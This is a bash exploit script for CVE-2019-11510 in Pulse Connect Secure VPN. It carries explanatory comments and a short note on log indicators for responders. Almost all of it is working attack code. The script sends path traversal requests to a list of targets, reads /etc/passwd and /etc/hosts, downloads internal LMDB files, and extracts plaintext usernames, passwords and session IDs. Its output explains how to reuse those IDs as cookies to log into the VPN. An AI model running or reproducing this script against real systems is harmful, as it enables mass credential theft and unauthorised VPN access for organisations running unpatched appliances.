
Exploit: Pulse Connect Secure 9.0R3 - RFR


#!/bin/bash
# Usage : cat targetlist.txt | bash CVE-2019-11510.sh     /   bash CVE-2019-11510.sh -d https://vpn.target.com/
# If you want to just verify the exploit and download /etc/passwd then use :  cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd     /   bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd 
# You must have binutils installed, install it by apt-get install binutils
# Release Date : 21/08/2019
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
# Print the banner verbatim. The string is double-quoted, so the backslashes in
# the ASCII art are kept literally; printf '%s\n' emits it unchanged, exactly as
# a plain echo would.
printf '%s\n' "=================================================================================
 ___             _           _     ____                 ___           _  _       
| _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _ 
|  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
|_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
              |__/                                                 CVE-2019-11510 
================================================================================="
# Every per-host artefact is written below ./output/<host>/; create the root
# directory once, relative to the current working directory.
[[ -d "output" ]] || mkdir "output"
##############################
# Command-line options; the first word that is not a recognised flag ends
# parsing. Globals written: DOM (single base URL from -d) and VER (non-empty
# when --only-etc-passwd was given).
# Note: both arms shift twice, so --only-etc-passwd also consumes the word
# that follows it, just as the original parser does.
while (( $# > 0 )); do
  case "$1" in
    -d)
      DOM=$2
      shift
      shift
      ;;
    --only-etc-passwd)
      VER="yes"
      shift
      shift
      ;;
    *)
      break
      ;;
  esac
done
##############################
#######################################
# Probe one Pulse Connect Secure base URL for CVE-2019-11510 and, when the
# traversal read succeeds, save the retrieved files under output/<host>/.
# Arguments: $1 - base URL; one trailing slash is stripped
# Globals:   VER (read) - when non-empty, stop after /etc/passwd
# Outputs:   status lines and file contents on stdout; files under output/
# Detection: every request is a GET whose path contains the literal
#   /dana-na/../dana/html5acc/guacamole/../../../../../../../<file>?/dana/html5acc/guacamole/
#   sequence; because curl is run with --path-as-is the ../ segments are not
#   collapsed client-side, so that exact string is what appears in the
#   appliance's web access logs. The files requested below (/etc/passwd,
#   /etc/hosts and the two lmdb data.mdb files) are the artefacts a responder
#   should look for.
#######################################
function checkexp {
# Strip a single trailing slash so the traversal path can be appended.
UR=$1
URL=${UR%/}
# -k disables TLS verification; the response body is written to a fixed
# file name in the current directory (shared by every invocation).
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" > c.txt
RE=$(cat c.txt)
# The host is judged vulnerable solely on this substring of the response.
if [[ $RE == *"root:x:0:0:root"* ]]; then
  echo "$URL ---------------> Vulnerable"
  # Host part of the URL: drop "scheme://" and everything from the next "/".
  URLDOM=$(echo $URL | sed -e 's|^[^/]*//||' -e 's|/.*$||')
  if [ ! -d "output/$URLDOM" ]; then
    mkdir "output/$URLDOM";
  fi
  echo "Writing all files to output/$URLDOM/"
  echo Extracting /etc/passwd
  # The probe response is the /etc/passwd copy; move it instead of re-fetching.
  mv c.txt output/$URLDOM/etc_passwd
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cat output/$URLDOM/etc_passwd
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  # VER is set by --only-etc-passwd; everything below is skipped when it is set.
  if [ -z "$VER" ]; then
  echo Extracting /etc/hosts
  curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" > output/$URLDOM/etc_hosts
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cat output/$URLDOM/etc_hosts
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password
  curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb
  echo Extracting Usernames and Passwords from /data/runtime/mtmp/lmdb/dataa/data.mdb
  # strings(1) comes from binutils (see the usage header).
  cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb | strings > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings
  # Join all lines into one, using "pzipzipzi" as the line marker so a later
  # sed can cut around it. sed -z is a GNU sed extension.
  cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | sed -z 's/\n/pzipzipzi/g' > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
  # Candidate user names: the value of the first "cn=" attribute on each line.
  cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | grep "cn=" | cut -d ',' -f1 | cut -d '=' -f2 > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  # For each user, look for "<user><separator>" in the joined file and take
  # the text between it and the next line marker as the password.
  # NOTE(review): the "[email protected]" literal on the next lines looks like
  # an e-mail obfuscation artefact of the page; the original separator token
  # cannot be recovered from here.
  while read -r line; do
	ST=$line"[email protected]"
    # $ST is unquoted (word-split and glob-expanded) and is used as a regex,
    # so "." in a user name matches any character.
    if grep -q $ST "output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod"; then	
	LI="s/.*"$line"[email protected]//;s/pzipzipzi.*//"
	# $LI is also passed unquoted; a user name containing whitespace would
	# split the sed script into several arguments.
	PASW=$(cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod | sed -e $LI)
	echo "User : $line | Password : $PASW"
	echo "User : $line | Password : $PASW" >> output/$URLDOM/plaintext_user_pass.txt
	else
	echo "User : $line | Password not found."
	fi
	done < output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
	echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	# Only the joined intermediate is removed; the .strings and .users files stay.
	rm output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
  echo "Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn"
  curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb
  # Session identifiers: printable strings containing "randomVal", with the
  # first 9 bytes dropped, de-duplicated.
  cat output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb | strings | grep randomVal | cut -b 10- | sort -u > output/$URLDOM/sessionids.txt
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cat output/$URLDOM/sessionids.txt
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fi
else
# Not vulnerable: the probe response is discarded (on the vulnerable path it
# was moved above, so c.txt is gone either way).
rm c.txt
echo "$URL ---------------> Not Vulnerable"
fi
}
##############################
# Dispatch: a single target when -d was given, otherwise one target per line
# read from stdin. The expansions are kept unquoted as in the original, so a
# line with whitespace is word-split and checkexp sees only its first word.
if [[ -n "$DOM" ]]; then
  # shellcheck disable=SC2086
  checkexp $DOM
else
  while read target; do
    # shellcheck disable=SC2086
    checkexp $target
  done
fi